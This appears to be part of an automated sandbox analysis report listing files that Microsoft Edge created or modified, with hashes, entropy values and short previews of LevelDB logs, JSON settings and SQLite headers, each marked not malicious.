                                                                                                                                                                                                                                                                                                  SHA-256:06EB7A8A0E0800178CFF4696936F1C3838BCD0EE506AA338B589A141872D967E
                                                                                                                                                                                                                                                                                                  SHA-512:73023ED379236554661C7A5A6C9C952720D2F9C6924DBF2698F9A294A0B29F2EF23B82D6A757139A99F8D084CD97CA40784A4225798A63652F9437CEF006DFCF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.029753789302956
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:c134q2P923oH+Tcwt8aPrqIFUt8yTJZmw+yTDkwO923oH+Tcwt8amLJ:c+v4YebL3FUt86/+G5LYebQJ
                                                                                                                                                                                                                                                                                                  MD5:564E0B19E4B17424A5031551ABBD7E0B
                                                                                                                                                                                                                                                                                                  SHA1:1D20D77BF2E4179597BFA7053C1FFC592625D540
                                                                                                                                                                                                                                                                                                  SHA-256:1C8057920F53B346D2AC7604061008CD078D8982E0DFAB714A9B065821269C29
                                                                                                                                                                                                                                                                                                  SHA-512:B015CBAB41A59DE2D2218C7466A44F4C227AD736461D92951A068BA8E82A807936094C5636A2CB8D119FE37DD07E573301828386D9138076501A3F1EA8C21B66
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.011 1c44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-00:24:20.012 1c44 Recovering log #3.2024/12/23-00:24:20.012 1c44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077116687614254
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:ZUq3+q2P923oH+Tcwt865IFUt8tZmw+xVkwO923oH+Tcwt86+ULJ:qq3+v4Yeb/WFUt8t/+xV5LYeb/+SJ
                                                                                                                                                                                                                                                                                                  MD5:D709792AC9E72E46D4EDFE6F9674C277
                                                                                                                                                                                                                                                                                                  SHA1:D45085B606DBA7F6FCC57D2C6112D8E1F38DB50E
                                                                                                                                                                                                                                                                                                  SHA-256:B828D088F0EE6F20ED75BAB70726C4544BA4274DCF31DF9612DCEF0FD7C3987A
                                                                                                                                                                                                                                                                                                  SHA-512:A5A9DD988CECD0961CBF14F94677820C20605CEC5446D26F0439C855A1E84E043AD9EFD4E3CF277C56A926D2BF99B7BA176FBDFC99DEC7E6CA566A445E3EF2EF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.101 1abc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-00:24:20.113 1abc Recovering log #3.2024/12/23-00:24:20.113 1abc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0980822269681045
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Wt+q2P923oH+Tcwt8NIFUt82MZZmw+2MNVkwO923oH+Tcwt8+eLJ:Hv4YebpFUt8R/+L5LYebqJ
                                                                                                                                                                                                                                                                                                  MD5:35575D150C2AEC3801830519F7126F48
                                                                                                                                                                                                                                                                                                  SHA1:90D780628A8890EE0AFA042CD1A84101934CC2BC
                                                                                                                                                                                                                                                                                                  SHA-256:75A50F6FC1CA57ACC19406175F30DED2790C7B62AC9D0B73F868E2A087CA7913
                                                                                                                                                                                                                                                                                                  SHA-512:E417F926C3017842C8DC055298C5F19275F5848862AC3400C29092DC44A80F5082DEF18CDA5AC2B6275F52AF7AE704587358EBD9253A42AA8FBC211047B5544A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.719 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-00:24:20.720 1c18 Recovering log #3.2024/12/23-00:24:20.720 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6481101165292493
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0tbQkQerkjl5cbP/KbtZ773pL9hCgam6ItRKToaAu:adKe2ml+bP/o7Pv9RKcC
                                                                                                                                                                                                                                                                                                  MD5:FA8EC40ED9F61724A8AAE14F146E8ABC
                                                                                                                                                                                                                                                                                                  SHA1:92BF481BB99EAC8D312AD5998C0B5ADB98B1F827
                                                                                                                                                                                                                                                                                                  SHA-256:2B1B3E6FFBB45D7CC182AFAA2B1DB5E4F7CDF495EC7BAA258C9B2D34B1947497
                                                                                                                                                                                                                                                                                                  SHA-512:8980A828715627BEAECE18A272172C895DC7167A289F73B9664D855AF6A0F8EB3E8225C10F7A6AD5C5D5C5299F12806232C76CD4AC443142C803CEF6517154F8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.269601441885248
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:DMyv4Yeb8rcHEZrELFUt89+Z/+9+lR5LYeb8rcHEZrEZSJ:AY4Yeb8nZrExg89ZyDLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                  MD5:1D5303A0006ABB460D69E8DD2243AECD
                                                                                                                                                                                                                                                                                                  SHA1:8F10AC0401CCA15915AAAC8B3407DE51E259801F
                                                                                                                                                                                                                                                                                                  SHA-256:D8D5EF27553678E06993E4DFD14914B470A5D850843453FFA3391AD5EA533A03
                                                                                                                                                                                                                                                                                                  SHA-512:E2A2FDED039E9023CF405AB64456E881AAEB7EF1F35766BA74AFA500D31E4A60C75B35CD6C070E108DCCB6E3A512EEC12978FE9B3E7E07601B8C8643F6DF02E2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.094 1374 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-00:24:26.095 1374 Recovering log #3.2024/12/23-00:24:26.095 1374 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1343
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5828634470557015
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:ytZWdmUlHFoln6PbwkT0DmXZcWpV03y1x4Cxq9IlswrnMyG:ytZ8mAunKbwPmXZLpV03Sx4LylsEMyG
                                                                                                                                                                                                                                                                                                  MD5:2D1C057B0CB1B2C42DAE859581067419
                                                                                                                                                                                                                                                                                                  SHA1:B4AF4C82981813A26438C43E1F2BE2E586B9DB5A
                                                                                                                                                                                                                                                                                                  SHA-256:C03A0A046BE3424471E7F838BA11971ACFEDFDF05D5C2202EA1943137E52CFA4
                                                                                                                                                                                                                                                                                                  SHA-512:8EB0F256AB743E101EE2B2C591DF4C7A57C5FE690729E15B9024BC54DCA88EDFF160887898BDEBE90538BDC0C2345F4E1E9DDF2436569CC38BA1137C8F603620
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.4.B8................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":785}.!_https://ntp.msn.com..LastKnownPV..1734931475262.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734931476161.._https://ntp.msn.com..MUID!.2DB99B69D85C6DF817C28E37D9F46CAD.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734931475328,"schedule":[-1,16,-1,32,-1,14,-1],"scheduleFixed":[-1,16,-1,32,-1,14,-1],"simpleSchedule":[18,16,22,44,36,10,9]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734931475235.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.138753906737369
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:5Uy9+q2P923oH+Tcwt8a2jMGIFUt8yVmNJZmw+yjk9VkwO923oH+Tcwt8a2jMmLJ:V4v4Yeb8EFUt8rJ/+GkD5LYeb8bJ
                                                                                                                                                                                                                                                                                                  MD5:8168D7751C4ECE8707488E705C92F15A
                                                                                                                                                                                                                                                                                                  SHA1:EF0F72B469A7405D2C9DA3E534681E6D9670D3DC
                                                                                                                                                                                                                                                                                                  SHA-256:21C9A582EAB8BF2B53E6794D3D4E870684F5D52CBB3B891A04ECE8AD86737E2C
                                                                                                                                                                                                                                                                                                  SHA-512:1847FE05248F2E59E172572773517B493F7E827F28B74494E6E7F7A325913DDB2AA55088F1606A370929A6214C7117214E228C72AEC485D2033744D727932A2A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.761 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:24:20.762 1db8 Recovering log #3.2024/12/23-00:24:20.764 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7750790014236455
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:tT56DE9DiMoSR5Zj2phiTHEudjgXcf0L/ZJVb:V56o9DiMo4552phumXI0LhJVb
                                                                                                                                                                                                                                                                                                  MD5:A0DEAE1FA8A135B96DE0C792553E6AE9
                                                                                                                                                                                                                                                                                                  SHA1:595859288FAAD6385E84984D2BD2C44FF2581879
                                                                                                                                                                                                                                                                                                  SHA-256:D0AC4C563E84443C081BF7964C74758E9F624C02F3B63EEDCFD74E556EA3EAC8
                                                                                                                                                                                                                                                                                                  SHA-512:F951D466A230392E4D459E8D56524E01297D365E2FAA946596AD0AD3449FF71EF84699FE6473FFB538838D439D1ADF78FBFE6D2931A085DA3591A9FC158FA07F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2147822752933626
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBRWg:eIEumQv8m1ccnvS60qYIv
                                                                                                                                                                                                                                                                                                  MD5:EC4EC6CF3D3765D2F44C7E3496B6E5DC
                                                                                                                                                                                                                                                                                                  SHA1:2703C67A91A3E0ED23AA4CD2C6A5215B6AD5F76A
                                                                                                                                                                                                                                                                                                  SHA-256:E7C40D8FC530ABA3A79A1B1DC663BFBAA8E4122D65B8CFCA980EECD66E902C1E
                                                                                                                                                                                                                                                                                                  SHA-512:2DFDD13D60D7A237350382E29E8D180F401879791A7D0C39F1EB93F9B85D7E524DEA100481FA340CF8CEA4151E0503F15562A202961F88DD71A24132AE50678E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                  MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                  SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                  SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                  SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9713
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1123214215596
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:st3kdpos4hsZihUkrHCV8ibV+FauQA66WuaFIMYSPLYJ:st3Qos4hfhQbG7Qx6WuaTYf
                                                                                                                                                                                                                                                                                                  MD5:18D9B84D4BE5616664981543C13336ED
